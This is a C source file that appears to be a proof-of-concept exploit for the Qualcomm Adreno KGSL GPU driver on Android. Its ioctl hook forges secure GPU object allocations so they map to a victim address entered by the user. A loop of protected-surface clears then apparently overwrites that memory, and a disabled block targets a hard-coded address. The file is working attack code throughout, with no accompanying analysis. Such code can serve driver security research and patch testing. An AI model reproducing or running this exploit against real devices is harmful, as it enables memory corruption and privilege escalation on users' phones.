#define ioctl ioctl_BARF

#include <err.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <GLES2/gl2.h>
#include <EGL/egl.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>

#undef ioctl

#define EGL_PROTECTED_CONTENT_EXT 0x32C0

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void fatal_egl(const char *msg) {
  while (1) {
    EGLint error = eglGetError();
    if (error == EGL_SUCCESS)
      errx(1, "%s", msg);
    printf("[EGL error] 0x%x\n", error);
  }
}

struct kgsl_gpuobj_alloc {
	uint64_t size;
	uint64_t flags;
	uint64_t va_len;
	uint64_t mmapsize;
	unsigned int id;
	unsigned int metadata_len;
	uint64_t metadata;
};

struct kgsl_gpuobj_info {
	uint64_t gpuaddr;
	uint64_t flags;
	uint64_t size;
	uint64_t va_len;
	uint64_t va_addr;
	unsigned int id;
};

#define KGSL_IOC_TYPE 0x09
struct kgsl_gpumem_alloc {
  unsigned long gpuaddr; /* output param */
  size_t size;
  unsigned int flags;
};
#define IOCTL_KGSL_GPUMEM_ALLOC \
  _IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)

static unsigned long victim_addr;

static unsigned long scratch_addr;
static unsigned long scratch_size;

#define FAKE_OBJECT_BASE 10000
#define FAKE_OBJECT_COUNT 100
static struct kgsl_gpuobj_info fake_objects[FAKE_OBJECT_COUNT];
static int fake_objects_usage;

int ioctl(int fd, unsigned int cmd, unsigned long arg) {
  int errno_ = errno;
  printf("ioctl(%d, 0x%x, 0x%lx) ", fd, cmd, arg);
  if ((cmd & 0xff00) == 0x0900) {
    switch (cmd&0xff) {
    case 0x2:
      printf("DEVICE_GETPROPERTY");
      break;
    case 0x7:
      printf("DEVICE_WAITTIMESTAMP_CTXTID");
      break;
    case 0x13:
      printf("DRAWCTXT_CREATE");
      break;
    case 0x14:
      printf("DRAWCTXT_DESTROY");
      break;
    case 0x30:
      printf("CFF_SYNCMEM");
      break;
    case 0x45:;
      struct kgsl_gpuobj_alloc *kga = (void*)arg;
      printf("GPUOBJ_ALLOC(size=%"PRIx64", %s, flags=0x%lx, va_len=0x%lx, mmapsize=0x%lx, id=%u, metadata_len=%u, metadata=0x%lx)",
        kga->size, (kga->flags & 8)?"SECURE":"insecure",
        kga->flags, kga->va_len, kga->mmapsize, kga->id, kga->metadata_len, kga->metadata);
      if (kga->flags & 8) {
        struct kgsl_gpuobj_info *fake_obj = fake_objects + fake_objects_usage;
        fake_obj->flags = kga->flags;
        fake_obj->id = FAKE_OBJECT_BASE + fake_objects_usage;
        fake_obj->size = kga->va_len;
        fake_obj->va_len = kga->va_len;
        fake_objects_usage++;
        if (kga->size >= 0x100000) {
          printf("  *******************  FAKING WITH VICTIM ADDRESS  *******************\n");
          fake_obj->gpuaddr = victim_addr;
        } else {
          printf("  *******************  FAKING WITH SCRATCH BUFFER  *******************\n");
          if (scratch_addr == 0)
            errx(1, "SCRATCH NOT READY");
          fake_obj->gpuaddr = scratch_addr;
          unsigned long rounded_size = (kga->size + 0xffffUL) & ~0xffffUL;
          if (scratch_size < rounded_size)
            errx(1, "scratch too small");
          scratch_addr += rounded_size;
          scratch_size -= rounded_size;
        }
        kga->id = fake_obj->id;
        return 0;
      }
      break;
    case 0x46:
      printf("GPUOBJ_FREE");
      break;
    case 0x47:
      printf("GPUOBJ_INFO");
      struct kgsl_gpuobj_info *info = (void*)arg;
      if (info->id - FAKE_OBJECT_BASE < FAKE_OBJECT_COUNT) {
        printf("  *******************  FAKING  *******************\n");
        *info = fake_objects[info->id - FAKE_OBJECT_BASE];
        return 0;
      }
      break;
    case 0x48:
      printf("GPUOBJ_IMPORT");
      break;
    case 0x4a:
      printf("GPU_COMMAND");
      break;
    default:
      printf("KGSL UNKNOWN");
      break;
    }
  }
  errno = errno_;
  int res = syscall(__NR_ioctl, fd, cmd, arg);
  errno_ = errno;
  printf(" = %d\n", res);
  if (/*res == 0 &&*/ (cmd & 0xffff) == 0x0947) {
    struct kgsl_gpuobj_info *info = (void*)arg;
    printf("  gpuaddr=0x%"PRIx64" flags=0x%"PRIx64" size=0x%"PRIx64" va_len=0x%"PRIx64" va_addr=0x%"PRIx64" id=%u\n",
           info->gpuaddr, info->flags, info->size, info->va_len, info->va_addr, info->id);
    #if 0
    if (info->size == 0x40000) {
      printf("  *******************   CLOBBERING   *******************\n");
      unsigned long injected_gpuaddr = 0xec813000;
      /*
      printf("ENTER CLOBBER ADDRESS: ");
      if (scanf("%lx", &injected_gpuaddr) != 1)
        errx(1, "bad input");
        */
      printf("TARGETING 0x%lx\n", injected_gpuaddr);
      info->gpuaddr = injected_gpuaddr /*0xec813000*//*0xec840000*/ /*+ 0x200000*/;
    }
    #endif
  }
  errno = errno_;
  return res;
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);

  EGLDisplay display = eglGetDisplay(EGL_DEFAULT_DISPLAY);
  if (display == EGL_NO_DISPLAY)
    errx(1, "no display");
  if (!eglInitialize(display, NULL, NULL))
    errx(1, "failed init");
  printf("EGL_VERSION = %s\n", eglQueryString(display, EGL_VERSION));

  const EGLint attrs[] = {
    EGL_RENDERABLE_TYPE, EGL_OPENGL_ES2_BIT,
    /*
                                EGL_RED_SIZE,
                                8,
                                EGL_GREEN_SIZE,
                                8,
                                EGL_BLUE_SIZE,
                                8,
                                EGL_ALPHA_SIZE,
                                0,
                                */
                                EGL_DEPTH_SIZE,
                                24,
                                EGL_STENCIL_SIZE,
                                0,
                                EGL_SURFACE_TYPE, EGL_PBUFFER_BIT|EGL_WINDOW_BIT,
                                EGL_NONE
  };
  EGLConfig configs[100];
  EGLint num_configs;
  if (!eglChooseConfig(display, attrs, configs, 100, &num_configs))
    errx(1, "eglChooseConfig()");
  if (num_configs == 0)
    errx(1, "no config");
  printf("found %u configs\n", (unsigned)num_configs);
  EGLConfig config = configs[0];

  const EGLint ctx_attrs[] = {
    EGL_CONTEXT_MAJOR_VERSION, 2,
    EGL_PROTECTED_CONTENT_EXT, EGL_TRUE,
    EGL_NONE
  };
  EGLContext ctx = eglCreateContext(display, config, NULL, ctx_attrs);
  if (ctx == EGL_NO_CONTEXT)
    errx(1, "eglCreateContext()");

  scratch_size = 0x800000;
  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));
  struct kgsl_gpumem_alloc kga_scratch = {
    .size = scratch_size,
    .flags = 0x100008, /* 64k aligned, secure */
  };
  SYSCHK(syscall(__NR_ioctl, kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga_scratch));
  scratch_addr = kga_scratch.gpuaddr;

  printf("VICTIM ADDRESS: ");
  if (scanf("%lx", &victim_addr) != 1)
    errx(1, "scanf");
  printf("VICTIM IS 0x%lx\n", victim_addr);

  EGLint surface_attrs_secure[] = {
    EGL_PROTECTED_CONTENT_EXT, EGL_TRUE,
    EGL_WIDTH, 1080,
    EGL_HEIGHT, 3*750,
    EGL_NONE
  };
  EGLSurface surf_secure = eglCreatePbufferSurface(display, config, surface_attrs_secure);
  if (surf_secure == EGL_NO_SURFACE)
    errx(1, "no surface");
  if (!eglMakeCurrent(display, surf_secure, surf_secure, ctx))
    fatal_egl("eglMakeCurrent");
  printf("created surface\n");
  while (1) {
    glEnable(GL_SCISSOR_TEST);

    glScissor(0, 0*750, 1080, 750);
    glClearColor(1.0, 0.0, 0.0, 0.5);
    glClear(GL_COLOR_BUFFER_BIT);

    glScissor(0, 1*750, 1080, 750);
    glClearColor(0.0, 1.0, 0.0, 0.5);
    glClear(GL_COLOR_BUFFER_BIT);

    glScissor(0, 2*750, 1080, 750);
    glClearColor(0.0, 0.0, 1.0, 0.5);
    glClear(GL_COLOR_BUFFER_BIT);

    glFinish();
  }
}
